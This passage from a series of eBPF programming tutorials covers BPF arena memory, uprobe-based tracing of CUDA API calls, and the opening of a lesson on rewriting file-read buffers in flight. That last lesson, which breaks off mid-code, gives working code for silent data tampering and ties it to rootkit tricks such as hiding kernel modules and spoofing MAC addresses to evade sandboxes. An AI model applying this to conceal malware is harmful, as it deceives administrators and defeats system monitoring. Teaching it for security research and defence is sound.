    if (ret != 0) {
        fprintf(stderr, "Failed to run arena_list_del: %d\n", ret);
        goto out;
    }
    sum = list_sum(skel->bss->list_head);
    printf("Sum after deletion: %d (expected: 0)\n", sum);
    printf("Sum computed by BPF: %d (expected: %d)\n", skel->bss->list_sum, expected_sum);

    printf("\nTest passed!\n");
out:
    arena_list_bpf__destroy(skel);
}

int main(int argc, char **argv)
{
    int cnt = 10;

    if (argc > 1) {
        cnt = atoi(argv[1]);
        if (cnt <= 0) {
            fprintf(stderr, "Invalid count: %s\n", argv[1]);
            return 1;
        }
    }

    printf("Testing arena list with %d elements\n", cnt);
    test_arena_list_add_del(cnt);

    return 0;
}

Understanding the User-Space Code

The userspace program demonstrates zero-copy access to arena memory. When we load the BPF skeleton using arena_list_bpf__open_and_load(), libbpf automatically mmap()s the arena into userspace. The pointer skel->bss->list_head points directly into this mapped arena memory.

The list_sum() function walks the linked list from userspace. Notice we're using the same list_for_each_entry() macro as the BPF code. The list is in arena memory, shared between kernel and userspace. Userspace can directly dereference arena pointers to access node values and follow next pointers - no syscalls needed. This is the zero-copy benefit: userspace reads memory directly from the mapped region.

The test flow orchestrates the demonstration. First, we set skel->bss->cnt to specify how many list elements to create. Then bpf_prog_test_run_opts() executes the arena_list_add BPF program, which builds the list in arena memory. Once that returns, userspace immediately calls list_sum() to verify the list by walking it directly from userspace - no syscalls, just direct memory access. The expected sum is calculated as 0+1+2+...+(cnt-1), which equals cnt*(cnt-1)/2.

After verifying the list, we run arena_list_del to remove all elements. This BPF program walks the list, computes its own sum, and calls bpf_free() on each node. Userspace then verifies the list is empty by calling list_sum() again, which should return 0. We also check that skel->bss->list_sum matches our expected value, confirming the BPF program computed the correct sum before deleting nodes.

Understanding Arena Memory Allocation

The arena allocator deserves a closer look because it shows how BPF programs can implement sophisticated memory management in arena space. The allocator in bpf_arena_alloc.h uses a per-CPU page fragment approach to avoid locking.

Each CPU maintains its own current page and offset. When you call bpf_alloc(size), it first rounds up the size to 8-byte alignment. If the current page has enough space at the current offset, it allocates from there by just decrementing the offset and returning a pointer. If not enough space remains, it allocates a fresh page using bpf_arena_alloc_pages(), which is a kernel helper that gets arena pages from the kernel's page allocator. Each page maintains a reference count in its last 8 bytes, tracking how many allocated objects point into that page.

The bpf_free(addr) function implements reference-counted deallocation. It rounds the address down to the page boundary, finds the reference count, and decrements it. When the count reaches zero - meaning all objects allocated from that page have been freed - it returns the entire page to the kernel using bpf_arena_free_pages(). This page-level reference counting means individual bpf_free() calls are fast, and memory is returned to the system only when appropriate.

This allocator design avoids locks by using per-CPU state. Since BPF programs run with preemption disabled on a single CPU, the current CPU's page fragment can be accessed without synchronization. This makes bpf_alloc() extremely fast - typically just a few instructions to allocate from the current page.

Compilation and Execution

Navigate to the bpf_arena directory and build the example:

cd bpf-developer-tutorial/src/features/bpf_arena
make

The Makefile compiles the BPF program with -D__BPF_FEATURE_ADDR_SPACE_CAST to enable arena pointer support. It uses bpftool gen object to process the compiled BPF object and generate a skeleton header that userspace can include.

Run the arena list test with 10 elements:

sudo ./arena_list 10

Expected output:

Testing arena list with 10 elements
Sum of elements: 45 (expected: 45)
Sum after deletion: 0 (expected: 0)
Sum computed by BPF: 45 (expected: 45)

Test passed!

Try it with more elements to see arena scaling:

sudo ./arena_list 100

The sum should be 4950 (100*99/2). Notice that userspace can verify the list by directly accessing arena memory without any syscalls. This zero-copy access is what makes arena powerful for large data structures.

When to Use Arena vs Other BPF Maps

Choosing the right BPF map type depends on your access patterns and data structure needs. Use regular BPF maps (hash, array, etc.) when you need simple key-value storage, small data structures that fit well in maps, standard map operations like atomic updates, or per-CPU statistics without complex linking. Maps excel at straightforward use cases with kernel-provided operations.

Use BPF Arena when you need complex linked structures like lists, trees, or graphs, large shared memory exceeding typical map sizes, zero-copy userspace access to avoid syscall overhead, or custom memory management beyond what maps provide. Arena shines for sophisticated data structures where pointer operations are natural.

Use Ring Buffers when you need one-way streaming from BPF to userspace, event logs or trace data, or sequentially processed data without random access. Ring buffers are optimized for high-throughput event streams but don't support bidirectional access or complex data structures.

The arena vs maps trade-off fundamentally comes down to pointers and access patterns. If you find yourself encoding indices to simulate pointers in BPF maps, arena is probably the better choice. If you need large-scale data structures accessible from both kernel and userspace, arena's zero-copy shared memory model is hard to beat.

Summary and Next Steps

BPF Arena solves a fundamental limitation of traditional BPF maps by providing sparse shared memory where you can use real C pointers to build complex data structures. Created by Alexei Starovoitov in 2024, arena enables linked lists, trees, graphs, and custom allocators using normal pointer operations instead of awkward integer indices. Both kernel BPF programs and userspace can map the same arena for zero-copy bidirectional access, eliminating syscall overhead.

Our linked list example demonstrates the core arena concepts: defining an arena map, using __arena annotations for pointer types, allocating memory with bpf_alloc(), and accessing the same data structure from both kernel and userspace. The per-CPU page fragment allocator shows how BPF programs can implement sophisticated memory management in arena space. Arena unlocks new possibilities for in-kernel data structures, key-value store accelerators, and large-scale data aggregation up to 4GB.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Original Arena Patches: https://lwn.net/Articles/961594/
Meta's Arena Examples: Linux kernel tree samples/bpf/arena_*.c
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena
Linux Kernel Source: kernel/bpf/arena.c - Arena implementation
LLVM Address Spaces: Documentation on __arena compiler support

This example is adapted from Meta's arena_list.c in the Linux kernel samples, with educational enhancements. Requires Linux kernel 6.10+ with CONFIG_BPF_ARENA=y enabled. Complete source code available in the tutorial repository.

eBPF Tutorial: Tracing CUDA GPU Operations

云微 — Tue, 30 Dec 2025 07:16:43 +0000

Have you ever wondered what's happening under the hood when your CUDA application is running? GPU operations can be challenging to debug and profile because they happen in a separate device with its own memory space. In this tutorial, we'll build a powerful eBPF-based tracing tool that lets you peek into CUDA API calls in real time.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events

Introduction to CUDA and GPU Tracing

CUDA (Compute Unified Device Architecture) is NVIDIA's parallel computing platform and programming model that enables developers to use NVIDIA GPUs for general-purpose processing. When you run a CUDA application, a typical workflow begins with the host (CPU) allocating memory on the device (GPU), followed by data transfer from host memory to device memory, then GPU kernels (functions) are launched to process the data, after which results are transferred back from device to host, and finally device memory is freed.

Each operation in this process involves CUDA API calls, such as cudaMalloc for memory allocation, cudaMemcpy for data transfer, and cudaLaunchKernel for kernel execution. Tracing these calls can provide valuable insights for debugging and performance optimization, but this isn't straightforward. GPU operations are asynchronous, meaning the CPU can continue executing after submitting work to the GPU without waiting, and traditional debugging tools often can't penetrate this asynchronous boundary to access GPU internal state.

This is where eBPF comes to the rescue! By using uprobes, we can intercept CUDA API calls in the user-space CUDA runtime library (libcudart.so) before they reach the GPU driver, capturing critical information. This approach allows us to gain deep insights into memory allocation sizes and patterns, data transfer directions and volumes, kernel launch parameters, error codes and failure reasons returned by the API, and precise timing information for each operation. By intercepting these calls on the CPU side, we can build a complete view of an application's GPU usage behavior without modifying application code or relying on proprietary profiling tools.

This tutorial primarily focuses on CPU-side CUDA API tracing, which provides a macro view of how applications interact with the GPU. However, CPU-side tracing alone has clear limitations. When a CUDA API function like cudaLaunchKernel is called, it merely submits a work request to the GPU. We can see when the kernel was launched, but we cannot observe what actually happens inside the GPU. Critical details such as how thousands of threads access memory, their execution patterns, branching behavior, and synchronization operations remain invisible. These details are crucial for understanding performance bottlenecks, such as whether memory access patterns cause coalesced access failures or whether severe thread divergence reduces execution efficiency.

To achieve fine-grained tracing of GPU operations, eBPF programs need to run directly on the GPU. This is exactly what the eGPU paper and bpftime GPU examples explore. bpftime converts eBPF programs into PTX instructions that GPUs can execute, then dynamically modifies CUDA binaries at runtime to inject these eBPF programs at kernel entry and exit points, enabling observation of GPU internal behavior. This approach allows developers to access GPU-specific information such as block indices, thread indices, global timers, and perform measurements and tracing on critical paths during kernel execution. This GPU-internal observability is essential for diagnosing complex performance issues, understanding kernel execution behavior, and optimizing GPU computation—capabilities that CPU-side tracing simply cannot provide.

Key CUDA Functions We Trace

Our tracer monitors several critical CUDA functions that represent the main operations in GPU computing. Understanding these functions helps you interpret the tracing results and diagnose issues in your CUDA applications:

Memory Management

cudaMalloc: Allocates memory on the GPU device. By tracing this, we can see how much memory is being requested, when, and whether it succeeds. Memory allocation failures are a common source of problems in CUDA applications.

  cudaError_t cudaMalloc(void** devPtr, size_t size);

cudaFree: Releases previously allocated memory on the GPU. Tracing this helps identify memory leaks (allocated memory that's never freed) and double-free errors.

  cudaError_t cudaFree(void* devPtr);

Data Transfer

cudaMemcpy: Copies data between host (CPU) and device (GPU) memory, or between different locations in device memory. The direction parameter (kind) tells us whether data is moving to the GPU, from the GPU, or within the GPU.

  cudaError_t cudaMemcpy(void* dst, const void* src, size_t count, cudaMemcpyKind kind);

The kind parameter can be:

cudaMemcpyHostToDevice (1): Copying from CPU to GPU
cudaMemcpyDeviceToHost (2): Copying from GPU to CPU
cudaMemcpyDeviceToDevice (3): Copying within GPU memory

Kernel Execution

cudaLaunchKernel: Launches a GPU kernel (function) to run on the device. This is where the actual parallel computation happens. Tracing this shows when kernels are launched and whether they succeed.

  cudaError_t cudaLaunchKernel(const void* func, dim3 gridDim, dim3 blockDim, 
                              void** args, size_t sharedMem, cudaStream_t stream);

Streams and Synchronization

CUDA uses streams for managing concurrency and asynchronous operations:

cudaStreamCreate: Creates a new stream for executing operations in order but potentially concurrently with other streams.

  cudaError_t cudaStreamCreate(cudaStream_t* pStream);

cudaStreamSynchronize: Waits for all operations in a stream to complete. This is a key synchronization point that can reveal performance bottlenecks.

  cudaError_t cudaStreamSynchronize(cudaStream_t stream);

Events

CUDA events are used for timing and synchronization:

cudaEventCreate: Creates an event object for timing operations.

  cudaError_t cudaEventCreate(cudaEvent_t* event);

cudaEventRecord: Records an event in a stream, which can be used for timing or synchronization.

  cudaError_t cudaEventRecord(cudaEvent_t event, cudaStream_t stream);

cudaEventSynchronize: Waits for an event to complete, which is another synchronization point.

  cudaError_t cudaEventSynchronize(cudaEvent_t event);

Device Management

cudaGetDevice: Gets the current device being used.

  cudaError_t cudaGetDevice(int* device);

cudaSetDevice: Sets the device to be used for GPU executions.

  cudaError_t cudaSetDevice(int device);

By tracing these functions, we gain complete visibility into the lifecycle of GPU operations, from device selection and memory allocation to data transfer, kernel execution, and synchronization. This enables us to identify bottlenecks, diagnose errors, and understand the behavior of CUDA applications.

Architecture Overview

Our CUDA events tracer consists of three main components:

Header File (cuda_events.h): Defines data structures for communication between kernel and user space
eBPF Program (cuda_events.bpf.c): Implements kernel-side hooks for CUDA functions using uprobes
User-Space Application (cuda_events.c): Loads the eBPF program, processes events, and displays them to the user

The tool uses eBPF uprobes to attach to CUDA API functions in the CUDA runtime library. When a CUDA function is called, the eBPF program captures the parameters and results, sending them to user space through a ring buffer.

Key Data Structures

The central data structure for our tracer is the struct event defined in cuda_events.h:

struct event {
    /* Common fields */
    int pid;                  /* Process ID */
    char comm[TASK_COMM_LEN]; /* Process name */
    enum cuda_event_type type;/* Type of CUDA event */

    /* Event-specific data (union to save space) */
    union {
        struct { size_t size; } mem;                 /* For malloc/memcpy */
        struct { void *ptr; } free_data;             /* For free */
        struct { size_t size; int kind; } memcpy_data; /* For memcpy */
        struct { void *func; } launch;               /* For kernel launch */
        struct { int device; } device;               /* For device operations */
        struct { void *handle; } handle;             /* For stream/event operations */
    };

    bool is_return;           /* True if this is from a return probe */
    int ret_val;              /* Return value (for return probes) */
    char details[MAX_DETAILS_LEN]; /* Additional details as string */
};

This structure is designed to efficiently capture information about different types of CUDA operations. The union is a clever space-saving technique since each event only needs one type of data at a time. For example, a memory allocation event needs to store the size, while a free event needs to store a pointer.

The cuda_event_type enum helps us categorize different CUDA operations:

enum cuda_event_type {
    CUDA_EVENT_MALLOC = 0,
    CUDA_EVENT_FREE,
    CUDA_EVENT_MEMCPY,
    CUDA_EVENT_LAUNCH_KERNEL,
    CUDA_EVENT_STREAM_CREATE,
    CUDA_EVENT_STREAM_SYNC,
    CUDA_EVENT_GET_DEVICE,
    CUDA_EVENT_SET_DEVICE,
    CUDA_EVENT_EVENT_CREATE,
    CUDA_EVENT_EVENT_RECORD,
    CUDA_EVENT_EVENT_SYNC
};

This enum covers the main CUDA operations we want to trace, from memory management to kernel launches and synchronization.

The eBPF Program Implementation

Let's dive into the eBPF program (cuda_events.bpf.c) that hooks into CUDA functions. The full code is available in the repository, but here are the key parts:

First, we create a ring buffer to communicate with user space:

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 256 * 1024);
} rb SEC(".maps");

The ring buffer is a crucial component for our tracer. It acts as a high-performance queue where the eBPF program can submit events, and the user-space application can retrieve them. We set a generous size of 256KB to handle bursts of events without losing data.

For each CUDA operation, we implement a helper function to collect relevant data. Let's look at the submit_malloc_event function as an example:

static inline int submit_malloc_event(size_t size, bool is_return, int ret_val) {
    struct event *e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    if (!e) return 0;

    /* Fill common fields */
    e->pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(&e->comm, sizeof(e->comm));
    e->type = CUDA_EVENT_MALLOC;
    e->is_return = is_return;

    /* Fill event-specific data */
    if (is_return) {
        e->ret_val = ret_val;
    } else {
        e->mem.size = size;
    }

    bpf_ringbuf_submit(e, 0);
    return 0;
}

This function first reserves space in the ring buffer for our event. Then it fills in common fields like the process ID and name. For a malloc event, we store either the requested size (on function entry) or the return value (on function exit). Finally, we submit the event to the ring buffer.

The actual probes are attached to CUDA functions using SEC annotations. For cudaMalloc, we have:

SEC("uprobe")
int BPF_KPROBE(cuda_malloc_enter, void **ptr, size_t size) {
    return submit_malloc_event(size, false, 0);
}

SEC("uretprobe")
int BPF_KRETPROBE(cuda_malloc_exit, int ret) {
    return submit_malloc_event(0, true, ret);
}

The first function is called when cudaMalloc is entered, capturing the requested size. The second is called when cudaMalloc returns, capturing the error code. This pattern is repeated for each CUDA function we want to trace.

One interesting case is cudaMemcpy, which transfers data between host and device:

SEC("uprobe")
int BPF_KPROBE(cuda_memcpy_enter, void *dst, const void *src, size_t size, int kind) {
    return submit_memcpy_event(size, kind, false, 0);
}

Here, we capture not just the size but also the "kind" parameter, which indicates the direction of the transfer (host-to-device, device-to-host, or device-to-device). This gives us valuable information about data movement patterns.

User-Space Application Details

The user-space application (cuda_events.c) is responsible for loading the eBPF program, processing events from the ring buffer, and displaying them in a user-friendly format.

First, the program parses command-line arguments to configure its behavior:

static struct env {
    bool verbose;
    bool print_timestamp;
    char *cuda_library_path;
    bool include_returns;
    int target_pid;
} env = {
    .print_timestamp = true,
    .include_returns = true,
    .cuda_library_path = NULL,
    .target_pid = -1,
};

This structure stores configuration options like whether to print timestamps or include return probes. The default values provide a sensible starting point.

The program uses libbpf to load and attach the eBPF program to CUDA functions:

int attach_cuda_func(struct cuda_events_bpf *skel, const char *lib_path, 
                    const char *func_name, struct bpf_program *prog_entry,
                    struct bpf_program *prog_exit) {
    /* Attach entry uprobe */
    if (prog_entry) {
        uprobe_opts.func_name = func_name;
        struct bpf_link *link = bpf_program__attach_uprobe_opts(prog_entry, 
                                env.target_pid, lib_path, 0, &uprobe_opts);
        /* Error handling... */
    }

    /* Attach exit uprobe */
    if (prog_exit) {
        /* Similar for return probe... */
    }
}

This function takes a function name (like "cudaMalloc") and the corresponding eBPF programs for entry and exit. It then attaches these programs as uprobes to the specified library.

One of the most important functions is handle_event, which processes events from the ring buffer:

static int handle_event(void *ctx, void *data, size_t data_sz) {
    const struct event *e = data;
    struct tm *tm;
    char ts[32];
    char details[MAX_DETAILS_LEN];
    time_t t;

    /* Skip return probes if requested */
    if (e->is_return && !env.include_returns)
        return 0;

    time(&t);
    tm = localtime(&t);
    strftime(ts, sizeof(ts), "%H:%M:%S", tm);

    get_event_details(e, details, sizeof(details));

    if (env.print_timestamp) {
        printf("%-8s ", ts);
    }

    printf("%-16s %-7d %-20s %8s %s\n", 
           e->comm, e->pid, 
           event_type_str(e->type),
           e->is_return ? "[EXIT]" : "[ENTER]",
           details);

    return 0;
}

This function formats and displays event information, including timestamps, process details, event type, and specific parameters or return values.

The get_event_details function converts raw event data into human-readable form:

static void get_event_details(const struct event *e, char *details, size_t len) {
    switch (e->type) {
    case CUDA_EVENT_MALLOC:
        if (!e->is_return)
            snprintf(details, len, "size=%zu bytes", e->mem.size);
        else
            snprintf(details, len, "returned=%s", cuda_error_str(e->ret_val));
        break;

    /* Similar cases for other event types... */
    }
}

This function handles each event type differently. For example, a malloc event shows the requested size on entry and the error code on exit.

The main event loop is remarkably simple:

while (!exiting) {
    err = ring_buffer__poll(rb, 100 /* timeout, ms */);
    /* Error handling... */
}

This polls the ring buffer for events, calling handle_event for each one. The 100ms timeout ensures the program remains responsive to signals like Ctrl+C.

CUDA Error Handling and Reporting

An important aspect of our tracer is translating CUDA error codes into human-readable messages. CUDA has over 100 different error codes, from simple ones like "out of memory" to complex ones like "unsupported PTX version."

Our tool includes a comprehensive cuda_error_str function that maps these numeric codes to string descriptions:

static const char *cuda_error_str(int error) {
    switch (error) {
    case 0:  return "Success";
    case 1:  return "InvalidValue";
    case 2:  return "OutOfMemory";
    /* Many more error codes... */
    default: return "Unknown";
    }
}

This makes the output much more useful for debugging. Instead of seeing "error 2", you'll see "OutOfMemory", which immediately tells you what went wrong.

Compilation and Execution

Building the tracer is straightforward with the provided Makefile:

# Build both the tracer and the example
make

This creates two binaries:

cuda_events: The eBPF-based CUDA tracing tool
basic02: A simple CUDA example application

The build system is smart enough to detect your GPU architecture using nvidia-smi and compile the CUDA code with the appropriate flags.

Running the tracer is just as easy:

# Start the tracing tool
sudo ./cuda_events -p ./basic02

# In another terminal, run the CUDA example
./basic02

You can also trace a specific process by PID:

# Run the CUDA example
./basic02 &
PID=$!

# Start the tracing tool with PID filtering
sudo ./cuda_events -p ./basic02 -d $PID

The example output shows detailed information about each CUDA operation:

Using CUDA library: ./basic02
TIME     PROCESS          PID     EVENT                 TYPE    DETAILS
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=1
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaLaunchKernel    [ENTER]  func=0x7f1234567890
17:35:41 basic02          12345   cudaLaunchKernel     [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=2
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234568000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234569000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success

This output shows the typical flow of a CUDA application:

Allocate memory on the device
Copy data from host to device (kind=1)
Launch a kernel to process the data
Copy results back from device to host (kind=2)
Free device memory

benchmark

We also provide a benchmark tool to test the performance of the tracer and the latency of the CUDA API calls.

make
sudo ./cuda_events -p ./bench
./bench

When there is no tracing, the result is like this:

Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           113.14 µs
cudaMemcpyH2D:        365.85 µs
cudaLaunchKernel:       7.82 µs
cudaMemcpyD2H:        393.55 µs
cudaFree:               0.00 µs

When the tracer is attached, the result is like this:

Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           119.81 µs
cudaMemcpyH2D:        367.16 µs
cudaLaunchKernel:       8.77 µs
cudaMemcpyD2H:        383.66 µs
cudaFree:               0.00 µs

The tracer adds about 2us overhead to each CUDA API call, which is negligible for most cases. To further reduce the overhead, you can try using the bpftime userspace runtime to optimize the eBPF program.

Command Line Options

The cuda_events tool supports these options:

-v: Enable verbose output for debugging
-t: Don't print timestamps
-r: Don't show function returns (only show function entries)
-p PATH: Specify the path to the CUDA runtime library or application
-d PID: Trace only the specified process ID

Next Steps

Once you're comfortable with this basic CUDA tracing tool, you could extend it to:

Add support for more CUDA API functions
Add timing information to analyze performance bottlenecks
Implement correlation between related operations (e.g., matching mallocs with frees)
Create visualizations of CUDA operations for easier analysis
Add support for other GPU frameworks like OpenCL or ROCm

For more detail about the cuda example and tutorial, you can checkout out repo and the code in https://github.com/eunomia-bpf/basic-cuda-tutorial

The code of this tutorial is in https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events

References

CUDA Programming Guide: https://docs.nvidia.com/cuda/cuda-c-programming-guide/
NVIDIA CUDA Runtime API: https://docs.nvidia.com/cuda/cuda-runtime-api/
libbpf Documentation: https://libbpf.readthedocs.io/
Linux uprobes Documentation: https://www.kernel.org/doc/Documentation/trace/uprobetracer.txt
eGPU: eBPF on GPUs: https://dl.acm.org/doi/10.1145/3723851.3726984
bpftime GPU Examples: https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

eBPF Tutorial: Transparent Text Replacement in File Reads

云微 — Tue, 23 Dec 2025 07:17:34 +0000

When you read a file in Linux, you trust that what you see matches what's stored on disk. But what if the kernel itself was lying to you? This tutorial demonstrates how eBPF programs can intercept file read operations and silently replace text before applications ever see it—creating a powerful capability for both defensive security monitoring and offensive rootkit techniques.

Unlike traditional file modification that leaves traces in timestamps and audit logs, this approach manipulates data in-flight during the read system call. The file on disk remains untouched, yet every program reading it sees modified content. This technique has legitimate uses in security research, honeypot deployment, and anti-malware deception, but also reveals how rootkits can hide their presence from system administrators.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/27-replace

Use Cases: From Security to Deception

Text replacement in file reads serves several purposes across the security spectrum. For defenders, it enables honeypot systems that present fake credentials to attackers, or deception layers that make malware believe it's succeeded when it hasn't. Security researchers use it to study malware behavior by feeding controlled data to suspicious processes.

On the offensive side, rootkits use this exact technique to hide their presence. The classic example is hiding kernel modules from lsmod by replacing their names in /proc/modules with whitespace or other module names. Malware can spoof MAC addresses by modifying reads from /sys/class/net/*/address, defeating sandbox detection that looks for virtual machine identifiers.

The key insight is that this operates at the system call boundary—after the kernel reads the file but before the userspace process sees the data. No matter how many times you cat the file or open it in different editors, you'll always see the modified version, because the eBPF program intercepts every read operation.

Architecture: Multi-Stage Text Scanning and Replacement

This implementation is more sophisticated than simple string replacement. The challenge is working within eBPF's constraints: limited stack size, no unbounded loops, and strict verifier checks. To handle arbitrarily large files and multiple matches, the program uses a three-stage approach with tail calls to chain eBPF programs together.

The first stage (find_possible_addrs) scans through the read buffer looking for characters that match the first character of our search string. It can't do full string matching yet due to complexity limits, so it just marks potential locations. These addresses are stored in map_name_addrs for the next stage.

The second stage (check_possible_addresses) is tail-called from the first. It examines each potential match location and performs full string comparison using bpf_strncmp. This verifies whether we actually found our target text. Confirmed matches go into map_to_replace_addrs.

The third stage (overwrite_addresses) loops through confirmed match locations and uses bpf_probe_write_user to overwrite the text with the replacement string. Because both strings must be the same length (to avoid shifting memory and corrupting the buffer), users must pad their replacement text to match.

This pipeline handles the verifier's complexity limits by splitting the work across multiple programs, each staying under the instruction count threshold. Tail calls provide the glue, allowing one program to pass control to the next with the same context.

Implementation Details

Let's examine the complete eBPF code that implements this three-stage pipeline:

// SPDX-License-Identifier: BSD-3-Clause
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "replace.h"

char LICENSE[] SEC("license") = "Dual BSD/GPL";

// Ringbuffer Map to pass messages from kernel to user
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 256 * 1024);
} rb SEC(".maps");

// Map to hold the File Descriptors from 'openat' calls
struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 8192);
    __type(key, size_t);
    __type(value, unsigned int);
} map_fds SEC(".maps");

// Map to fold the buffer sized from 'read' calls
struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 8192);
    __type(key, size_t);
    __type(value, long unsigned int);
} map_buff_addrs SEC(".maps");

// Map to fold the buffer sized from 'read' calls
// NOTE: This should probably be a map-of-maps, with the top-level
// key bing pid_tgid, so we know we're looking at the right program
#define MAX_POSSIBLE_ADDRS 500
struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, MAX_POSSIBLE_ADDRS);
    __type(key, unsigned int);
    __type(value, long unsigned int);
} map_name_addrs SEC(".maps");
struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, MAX_POSSIBLE_ADDRS);
    __type(key, unsigned int);
    __type(value, long unsigned int);
} map_to_replace_addrs SEC(".maps");

// Map holding the programs for tail calls
struct {
    __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
    __uint(max_entries, 5);
    __type(key, __u32);
    __type(value, __u32);
} map_prog_array SEC(".maps");

// Optional Target Parent PID
const volatile int target_ppid = 0;

// These store the name of the file to replace text in
const volatile int filename_len = 0;
const volatile char filename[50];

// These store the text to find and replace in the file
const volatile  unsigned int text_len = 0;
const volatile char text_find[FILENAME_LEN_MAX];
const volatile char text_replace[FILENAME_LEN_MAX];

SEC("tp/syscalls/sys_exit_close")
int handle_close_exit(struct trace_event_raw_sys_exit *ctx)
{
    // Check if we're a process thread of interest
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int pid = pid_tgid >> 32;
    unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
    if (check == 0) {
        return 0;
    }

    // Closing file, delete fd from all maps to clean up
    bpf_map_delete_elem(&map_fds, &pid_tgid);
    bpf_map_delete_elem(&map_buff_addrs, &pid_tgid);

    return 0;
}

SEC("tp/syscalls/sys_enter_openat")
int handle_openat_enter(struct trace_event_raw_sys_enter *ctx)
{
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int pid = pid_tgid >> 32;
    // Check if we're a process thread of interest
    // if target_ppid is 0 then we target all pids
    if (target_ppid != 0) {
        struct task_struct *task = (struct task_struct *)bpf_get_current_task();
        int ppid = BPF_CORE_READ(task, real_parent, tgid);
        if (ppid != target_ppid) {
            return 0;
        }
    }

    // Get filename from arguments
    char check_filename[FILENAME_LEN_MAX];
    bpf_probe_read_user(&check_filename, filename_len, (char*)ctx->args[1]);

    // Check filename is our target
    for (int i = 0; i < filename_len; i++) {
        if (filename[i] != check_filename[i]) {
            return 0;
        }
    }

    // Add pid_tgid to map for our sys_exit call
    unsigned int zero = 0;
    bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY);

    bpf_printk("[TEXT_REPLACE] PID %d Filename %s\n", pid, filename);
    return 0;
}

SEC("tp/syscalls/sys_exit_openat")
int handle_openat_exit(struct trace_event_raw_sys_exit *ctx)
{
    // Check this open call is opening our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
    if (check == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;

    // Set the map value to be the returned file descriptor
    unsigned int fd = (unsigned int)ctx->ret;
    bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY);

    return 0;
}

SEC("tp/syscalls/sys_enter_read")
int handle_read_enter(struct trace_event_raw_sys_enter *ctx)
{
    // Check this open call is opening our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int pid = pid_tgid >> 32;
    unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid);
    if (pfd == 0) {
        return 0;
    }

    // Check this is the correct file descriptor
    unsigned int map_fd = *pfd;
    unsigned int fd = (unsigned int)ctx->args[0];
    if (map_fd != fd) {
        return 0;
    }

    // Store buffer address from arguments in map
    long unsigned int buff_addr = ctx->args[1];
    bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY);

    // log and exit
    size_t buff_size = (size_t)ctx->args[2];
    bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr);
    bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size);
    return 0;
}

SEC("tp/syscalls/sys_exit_read")
int find_possible_addrs(struct trace_event_raw_sys_exit *ctx)
{
    // Check this open call is reading our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
    if (pbuff_addr == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;
    long unsigned int buff_addr = *pbuff_addr;
    long unsigned int name_addr = 0;
    if (buff_addr <= 0) {
        return 0;
    }

    // This is amount of data returned from the read syscall
    if (ctx->ret <= 0) {
        return 0;
    }
    long int buff_size = ctx->ret;
    unsigned long int read_size = buff_size;

    bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr);
    // 64 may be to large for loop
    char local_buff[LOCAL_BUFF_SIZE] = { 0x00 };

    if (read_size > (LOCAL_BUFF_SIZE+1)) {
        // Need to loop :-(
        read_size = LOCAL_BUFF_SIZE;
    }

    // Read the data returned in chunks, and note every instance
    // of the first character of our 'to find' text.
    // This is all very convoluted, but is required to keep
    // the program complexity and size low enough the pass the verifier checks
